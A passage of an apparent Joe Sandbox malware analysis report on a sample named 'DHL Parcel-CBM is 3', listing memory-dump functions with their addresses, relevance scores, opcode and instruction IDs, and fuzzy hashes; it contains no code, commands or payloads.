Instruction Fuzzy Hash: 0C21F6B4E0122DCFDBA4DF64C888BA9BBB2BB49300F1080E5D519A7255EB749E81DF51

Function 0675B511 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6529c724cd919fbc04009667734fe0ab67038f419024b7831a41a68b59ff3195
Instruction ID: 71b295d5621a8d8b0bfad0e0c0e76588c14770be39701ca7ec03089a98b07af0
Opcode Fuzzy Hash: 6529c724cd919fbc04009667734fe0ab67038f419024b7831a41a68b59ff3195
Instruction Fuzzy Hash: D8019E3630A3919FD7064B38EC64CB67FB4EF4662032A45D7F840CB2A3D6249D05CBA2

Function 069E81B7 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df49c20810e14d69f463ff02c0e99bb7219afcb9b7198f144f120b3456240ad7
Instruction ID: 0fd05aed45668d29a099079d74f72148cb276c60921a9c26af9c229e2b71eb6d
Opcode Fuzzy Hash: df49c20810e14d69f463ff02c0e99bb7219afcb9b7198f144f120b3456240ad7
Instruction Fuzzy Hash: 2831D374A05229CFDBA1DF64C944BE9BBB2EB49304F0080E9D509AB245D7359E81DF41

Function 027BC4C8 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c05a6cbdb6c727347afe4775315e546c622013f5b97ca8299fcc09c8b4434d4e
Instruction ID: 6fe85d312cd6f749e45bc7178cfb2e3dadca4058a80b51945b4e8b320d646728
Opcode Fuzzy Hash: c05a6cbdb6c727347afe4775315e546c622013f5b97ca8299fcc09c8b4434d4e
Instruction Fuzzy Hash: B0110774D04119CFDB06CF99D844AEEBBF6EF88314F20942AD609B3250D7745A45CFA4

Function 0675710C Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a07880386eed0f8f975ddc2a834bceae49296d145ef560d48e0117de62c947c5
Instruction ID: 57e4959d53eb4d9b5fd6491496d692cc8843b3b355eaf230e13e186867f78f09
Opcode Fuzzy Hash: a07880386eed0f8f975ddc2a834bceae49296d145ef560d48e0117de62c947c5
Instruction Fuzzy Hash: 1521F970E011188FDB58DF65E8547ADBBB2EF89300F00C4AAE90AAB255DB745D45DF41

Function 069EA422 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a6e1d03ff65f5811603ab67e0bd34eb0f42b67313ef7c47382cbdc09a18e4b4
Instruction ID: b9d13c04ea3098a40b4ef68eb137dc8f21da57264598fd5a3158f3e85c176f0d
Opcode Fuzzy Hash: 9a6e1d03ff65f5811603ab67e0bd34eb0f42b67313ef7c47382cbdc09a18e4b4
Instruction Fuzzy Hash: 8511043180420CEFC746DFE8C848ADEBBF8EF89300F1485A5D904636A0EA325E41EB95

Function 069E8DCF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d5b90eac0be38e5d3f6f1cdaa02a0e2c20dadfe41cea3a746eca2806987fb9a
Instruction ID: dc99b1f03c420b196763c893eb5a3e9fc7eee259edbf2815d0eb2a03b7895022
Opcode Fuzzy Hash: 4d5b90eac0be38e5d3f6f1cdaa02a0e2c20dadfe41cea3a746eca2806987fb9a
Instruction Fuzzy Hash: FB212270A01629DFEBA0DF65CD40BEAB7B9BB89304F1080E9E50DA7241E7349E85CF50

Function 00FAD6C3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096535518.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fad000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction ID: eb3e3bda74737af86754a84202af03574806fe9a19d43a7c6d99a9b0ea4bb16b
Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction Fuzzy Hash: C411D3B6904240CFDF16CF10D5C4B1ABF72FB95324F24C6A9D80A0B656C33AD85ADBA1

Function 027B2168 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de7e4a2122f1b62817cb611caf290509eec7e7ce5c9e3a8176504984a15d6055
Instruction ID: c61bcac1e9c784aa2ad6812aed3dfa88113d1f494e9c89a8106eb23025c42f81
Opcode Fuzzy Hash: de7e4a2122f1b62817cb611caf290509eec7e7ce5c9e3a8176504984a15d6055
Instruction Fuzzy Hash: B211DB74A0A2485FC31357254C48BEE77A6EF8A340F194569FE1AD73A7C6708C01CB51

Function 0675B661 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7dea038bc9aca3edfee59fac68b496b357230277a7ab697c5813f6c4868502d
Instruction ID: 69c98a004d10e7c602f0820e6c2fe5f2a49baa9a455a54e148354d6c46413838
Opcode Fuzzy Hash: a7dea038bc9aca3edfee59fac68b496b357230277a7ab697c5813f6c4868502d
Instruction Fuzzy Hash: 692173B8A02219DFDB04DF98D594EADB7F2FF49700F114095E905AB361DB74AD41CB50

Function 069E5D50 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bf1f082d370985f549b00013f5955b4c7e821b15fb504e603d126bb67553078
Instruction ID: 275e18cf0aabc76e013a115cdff2bf392e2b6dec3a8e071550430f08fbce2995
Opcode Fuzzy Hash: 4bf1f082d370985f549b00013f5955b4c7e821b15fb504e603d126bb67553078
Instruction Fuzzy Hash: 9F216A74D052188FDB90DFA8E88479DBBB2FB09314F2180AAD469EB251DB359E41CF41

Function 027B1388 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9156d5e0ee5b25fe2b917c13ed9bc39cfec2942d9400de085735cf206ab23214
Instruction ID: b1cbcb317489bfbc6ce77cfaa3230073c4b80965d6c691c81d1bbaf2e2dab0a9
Opcode Fuzzy Hash: 9156d5e0ee5b25fe2b917c13ed9bc39cfec2942d9400de085735cf206ab23214
Instruction Fuzzy Hash: 12114674E002099FCB44EFB8D9959AEBBB6EFC8300B108569E505A7355DF30AD05CF91

Function 0675CB90 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb6a392b606b7b36a4d37a0f07bbe31e2f2625877c2f3d041d3f6a7b59d30e25
Instruction ID: afc226acf9e2ab2b4396e2c8bc42abaf75a3d532012dc4ad6e35c3cbd80fb6ab
Opcode Fuzzy Hash: fb6a392b606b7b36a4d37a0f07bbe31e2f2625877c2f3d041d3f6a7b59d30e25
Instruction Fuzzy Hash: 861186B5F0020ADBCB00EF99C8815AFFBB5FF84204B10842DD519A7345DB70AD0587D1

Function 027B1D91 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e104e4cc9f629914f3d2b58096cabc77744b8dd6061be13f38475e00d7ba865e
Instruction ID: f21afc71ed751d9567d7da17aa2945e9e21431db8f79a3e534ffe20728681dde
Opcode Fuzzy Hash: e104e4cc9f629914f3d2b58096cabc77744b8dd6061be13f38475e00d7ba865e
Instruction Fuzzy Hash: 37113938B04108CFEB09DFA9D9A8BED77B1EF48315F604465E50AAB3A4CB759944CF41

Function 0675B540 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0fe68e26ba93e6ad6c044702a12cb90ce79d00353bef5d13d342f08a59c28d
Instruction ID: 5f45647829459989e4627c5d75a0f9bcc7999ceec98c8047eb8901c34f63a44c
Opcode Fuzzy Hash: 4e0fe68e26ba93e6ad6c044702a12cb90ce79d00353bef5d13d342f08a59c28d
Instruction Fuzzy Hash: 7F016C76340319AFD7148F59DC94FAB77A9FB88B21F104066FA15CB290D6B1D9118B90

Function 027B2178 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf3c2b4125d316b345c6c6ef64a649e8b44631b2b9c4be937ee7b09721ae190b
Instruction ID: 9f3f761e6291180fc8265fdf8ab82ad8e3be85d8909c2ddccfe6965f25b9c77b
Opcode Fuzzy Hash: cf3c2b4125d316b345c6c6ef64a649e8b44631b2b9c4be937ee7b09721ae190b
Instruction Fuzzy Hash: C7012634B092089FC3026659AC48BABB2E6EFC9350F244426FE0EE7396DA709D00C791

Function 027B1518 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 882b7c987366e5834e8565637005902986ff7081bcf4a675c8cbdb63cc0daf0f
Instruction ID: 5ca4e49932021789dfc066c067ab53f3af5ca8321036beaf8c9860ebf72cb0a4
Opcode Fuzzy Hash: 882b7c987366e5834e8565637005902986ff7081bcf4a675c8cbdb63cc0daf0f
Instruction Fuzzy Hash: 441182747001118FEB56DB34C868BA53BE2EF89304F558469D40BDB3A6DB35DC01CB41

Function 065CE4C0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44a654e898e5f2344cacb93488dd0914f133482bc967d4895ea8d711e3681b79
Instruction ID: 65b950ee5ab6e4edd346d46e2f454f527c0110c23fae77c2679c5daaf7796809
Opcode Fuzzy Hash: 44a654e898e5f2344cacb93488dd0914f133482bc967d4895ea8d711e3681b79
Instruction Fuzzy Hash: D801D436405248AFCB41CFE4D805AEEBBF8EF49210B1080CAE848C7251D9319F40DBA1

Function 069E8E48 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 599197ff1232e1e71173189d98f81330c4d86aeb9db7150b21ac652de8ba1b68
Instruction ID: 52c6ed6408769caa2499e4cd5f27c40c83958f771f942e1643cca98211317833
Opcode Fuzzy Hash: 599197ff1232e1e71173189d98f81330c4d86aeb9db7150b21ac652de8ba1b68
Instruction Fuzzy Hash: BA110371900629DFDB61DFA4CD80BE9B7B9BB49304F1484EAE50DA7240D7309A8ACF50

Function 06756FD0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 933c9f00a25c844b6cbb716922ed97a9d6aa56534d7073619c8d091ea196b205
Instruction ID: 53852f7a3b8569231fa304dd33f4c808cd90f6b78b5527de4c087cc01c4e6c80
Opcode Fuzzy Hash: 933c9f00a25c844b6cbb716922ed97a9d6aa56534d7073619c8d091ea196b205
Instruction Fuzzy Hash: A0118EB0904218CFEB58DF2AD8447EDB7F6EB8A311F10C5A9D50DA3251DBB55E849F80

Function 06A6F760 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117325560.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5a25df10f40b62a7508aa37527322fd746199942d75269f824a8cf1ce7baff4
Instruction ID: ccd74e99eb56c9eccb28e3b4d8a0a3afd51da7e36ff18ebc372365411bc8eb86
Opcode Fuzzy Hash: e5a25df10f40b62a7508aa37527322fd746199942d75269f824a8cf1ce7baff4
Instruction Fuzzy Hash: BB11B7B4E002199FCB44DFA9C8456AFBBF1FF88300F20856A9518A7355DA749A419F91

Function 065CB022 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80f3ef2f820b7d2e5059bcf52cd51c31f01c082ca43afae369ba74ae8af0a9c5
Instruction ID: 48bbe663a1e50ee380182b6aa964eb82d3d02b1723fa29edf88a8c80a9a87010
Opcode Fuzzy Hash: 80f3ef2f820b7d2e5059bcf52cd51c31f01c082ca43afae369ba74ae8af0a9c5
Instruction Fuzzy Hash: 80018F749092489FC782DFE4D8415ADBFF0EF45310B1485EAD85897251DA354E45DF82

Function 06A535A1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117325560.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a50000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5fd3903ce947a427ca87c56466317bcc617f3a2ddf73a3ee503a0ed90253a2f
Instruction ID: 2ae8a2a72298bb85619f3085e158ab962bfaa68e153490a4e8976a9f2f1c7f0a
Opcode Fuzzy Hash: f5fd3903ce947a427ca87c56466317bcc617f3a2ddf73a3ee503a0ed90253a2f
Instruction Fuzzy Hash: 31110DB4E4012ACFDB68DF24C984BAAB7F2FB89304F1180E9E51997345DB345E849F51

Function 0675A958 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 301008a5caa5f0177997a39456a6fb75d5aaf0b7b0ed7d1dec92da2189f62e74
Instruction ID: 7b6643fc5663d9ae536916ea56009568b3f6981f15ec45c9fabb51ac79592ab9
Opcode Fuzzy Hash: 301008a5caa5f0177997a39456a6fb75d5aaf0b7b0ed7d1dec92da2189f62e74
Instruction Fuzzy Hash: B8F04C72B093216FE31546549810777FBB8EBC9320F1645BAE844CB351CBB29D41C3D0

Function 0675718C Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5122d975b6ba99aa3e3e2495a1f27a2bbddb5e93511108b958464ca613999d9
Instruction ID: 72e5fecc4c51301600f7e23bf4c3c72f59f3ad3b75d42f8666372726bda12b0d
Opcode Fuzzy Hash: c5122d975b6ba99aa3e3e2495a1f27a2bbddb5e93511108b958464ca613999d9
Instruction Fuzzy Hash: 94113C70E012588FDB98DFA5E8506ADBBB2EF89300F10C4A9E50ABB354EB345D44CF41

Function 00FAD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096535518.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fad000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b4f0e4dfa05f3f744928cba1b3529be48dbcbc6e133f4b3909cb1a9690480e4
Instruction ID: a9dce91738b389fa29ef336c5f9fb1207f88e4c6f9521afa2d000001940c3007
Opcode Fuzzy Hash: 3b4f0e4dfa05f3f744928cba1b3529be48dbcbc6e133f4b3909cb1a9690480e4
Instruction Fuzzy Hash: AA012BB24043409AE7108A25CDC4767BF98EF53334F18C459EC4A0B58AC3799C41E6B1

Function 00FAD005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2096535518.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fad000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5afd86ad7fd2cc4fdc628829f468634253cabca5a4472e6539cff23d390b57e
Instruction ID: 9a4423e804a413eec565401e7506debac911241dfd9667bec7bf12da7e6f0382
Opcode Fuzzy Hash: a5afd86ad7fd2cc4fdc628829f468634253cabca5a4472e6539cff23d390b57e
Instruction Fuzzy Hash: FA018C6240E3C09FD7128B258894B52BFB4EF53224F19C0DBE8888F1A7C2695C49D772

Function 06757034 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e79fc542169f532d541107e918e1154dbfcbc3632f4dbd34e58be3fbd05d82ef
Instruction ID: 503f8ce3c12e10b243ab8be5dc17393051030f982f564c2906524530b2f1755a
Opcode Fuzzy Hash: e79fc542169f532d541107e918e1154dbfcbc3632f4dbd34e58be3fbd05d82ef
Instruction Fuzzy Hash: C0116074A00228CFDB54DF54D8447CDB7B2FB89300F1081AAEA49A7344DB385E81DF52

Function 065C5768 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c45f04c4a02d5cf0a085aaaac43bc11031679b12567b5ba4c371ff40a37ae1b
Instruction ID: bd045205b7dee340e732a4904ac967782a9d20787e2b236ca7874baa13ac097a
Opcode Fuzzy Hash: 6c45f04c4a02d5cf0a085aaaac43bc11031679b12567b5ba4c371ff40a37ae1b
Instruction Fuzzy Hash: 7B01B135700704DFC3659BA4D444A2A77A2FBC9360F14892CD5524B791DB75FC52DB80

Function 065CF307 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a043642c4e51ba0f0e770cb65653a544cf18deac2aa3d225b722814c3ccf5b26
Instruction ID: defd1d0545119399ef5d70431211ec3829ebf15fca51d634bf5674423608e8fb
Opcode Fuzzy Hash: a043642c4e51ba0f0e770cb65653a544cf18deac2aa3d225b722814c3ccf5b26
Instruction Fuzzy Hash: D001A735905208BFC751DFE4DC419EEBFF9EF45310F1081DAE84897261D9315A50DB92

Function 027B09E9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2097793255.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27b0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef7e0ebb35721c004317843969d664eea1b3731e1a32fec00a7bab26b3012c3
Instruction ID: 5c20691d8475de76d693be7cda5ea1487c246a1ddace73e2948d627e31132f4c
Opcode Fuzzy Hash: 3ef7e0ebb35721c004317843969d664eea1b3731e1a32fec00a7bab26b3012c3
Instruction Fuzzy Hash: C7018F32D1474A8BCB119BB8D8548EEFFB2AFCA321F194756D115770A1E770218ACBA1

Function 065EE861 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b1f7fa89316c34e0e87bb5785c9b8df08797d3485aa1561ddad64b46799447e
Instruction ID: 893e935310e16a5ae0d2105c7d31572fde1061e0da5931fa051b9bab844f527c
Opcode Fuzzy Hash: 3b1f7fa89316c34e0e87bb5785c9b8df08797d3485aa1561ddad64b46799447e
Instruction Fuzzy Hash: EF01E874D19209EFCB44DFA8D9456EEBBF4EB09204F2045AAE908E3251E7354A50CFA1

Function 069E5264 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2117286252.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_69e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6a72dfbbb491efa62bb791986bf9f85b21e6e6ef953c441f5db683b65363dcd
Instruction ID: 6baefee1c76419975a31aedea1719523a121d6c6dae038f36b122c311db91f6f
Opcode Fuzzy Hash: f6a72dfbbb491efa62bb791986bf9f85b21e6e6ef953c441f5db683b65363dcd
Instruction Fuzzy Hash: A911F070E05208CFEB95CFA9D4846ACBBF6FB49308F218429E009AB755E7769C42CF00

Function 065E2B78 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116236055.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65e0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcbc1fc607c0249e1d82d106e41354a86a4f5b96a86e20101badce4a5d043fde
Instruction ID: 2df1707df9efaa5bec8038b4057348c9201a47235dc1a2cc75ffe108bfffa570
Opcode Fuzzy Hash: fcbc1fc607c0249e1d82d106e41354a86a4f5b96a86e20101badce4a5d043fde
Instruction Fuzzy Hash: 68F0F03480A20CAFCB91DFA0DC00DEA7BBCEF46200F1045D5E905A7251D9324F00CBE2

Function 0675B738 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702dc38ef4ee8fcbb8a230e091bd6a6028b884632bbbaf56a4871d6949162da9
Instruction ID: e898717180db4df3b18795acdcd2f4ceaa40171eb86ae0c05942c9e228a14e99
Opcode Fuzzy Hash: 702dc38ef4ee8fcbb8a230e091bd6a6028b884632bbbaf56a4871d6949162da9
Instruction Fuzzy Hash: 0AF0A4326052519FD714DF18E824EBA7BB5DB41710F1388AAED05DB142DAB1AD81C7E0

Function 065C0EF2 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a654516157fda8628afcc2d54421ea6cf60b492426078f8082db8ad6045490c
Instruction ID: d6eb5fccce304f50f0e77e7e3b9423f7f61d2c783dd61018f92e8e9bf7f7b5d6
Opcode Fuzzy Hash: 9a654516157fda8628afcc2d54421ea6cf60b492426078f8082db8ad6045490c
Instruction Fuzzy Hash: E6F0B42020B7924FD7439728AC254963FA2EF427203544A9AF081CB2D7EA14CD59C3A5

Function 065C33E8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116124693.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_65c0000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd75a9d71a708f4d6e4a19befb346757f588520db61b294d894904a7607fa9c6
Instruction ID: 1445f9725fdb6da6c6a47ce3b45b5a8b1ec0358ff1cb15b7cf109ee2c9fc45fa
Opcode Fuzzy Hash: cd75a9d71a708f4d6e4a19befb346757f588520db61b294d894904a7607fa9c6
Instruction Fuzzy Hash: 4E01C835341300AFC355DB69D854D66BBBAEFC9621B1540EDF945CB3A1CA72EC42CBA0

Function 0675454E Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2116756351.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6750000_DHL Parcel-CBM is 3.jbxd

Similarity

API ID:
String ID:
